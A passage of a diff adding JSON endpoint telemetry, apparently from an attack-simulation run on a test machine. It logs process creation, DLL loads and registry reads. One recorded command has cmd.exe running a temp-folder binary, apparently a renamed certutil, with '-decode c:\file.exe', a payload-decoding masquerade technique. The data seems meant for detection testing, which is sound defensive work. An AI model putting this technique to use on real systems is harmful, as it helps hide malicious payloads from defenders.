"ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "command_line": "cmd.exe /c C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5572, + "ppid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573502380016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}", + "unique_ppid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573502300000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "command_line": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 976, + "ppid": 5572, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "subtype": "create", + "timestamp": 131883573502530000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}", + "unique_ppid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "Temptcm.tmp", + "image_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502610000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502610000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502610000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502610000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "normaliz.dll", + "image_path": "C:\\Windows\\System32\\normaliz.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\System32\\setupapi.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "Wldap32.dll", + "image_path": "C:\\Windows\\System32\\Wldap32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "certcli.dll", + "image_path": "C:\\Windows\\System32\\certcli.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "cabinet.dll", + "image_path": "C:\\Windows\\System32\\cabinet.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "cryptui.dll", + "image_path": "C:\\Windows\\System32\\cryptui.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "netapi32.dll", + "image_path": "C:\\Windows\\System32\\netapi32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502770000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdsapi.dll", + "image_path": "C:\\Windows\\System32\\ntdsapi.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "certca.dll", + "image_path": "C:\\Windows\\System32\\certca.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "dsrole.dll", + "image_path": "C:\\Windows\\System32\\dsrole.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "logoncli.dll", + "image_path": "C:\\Windows\\System32\\logoncli.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573502920000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": 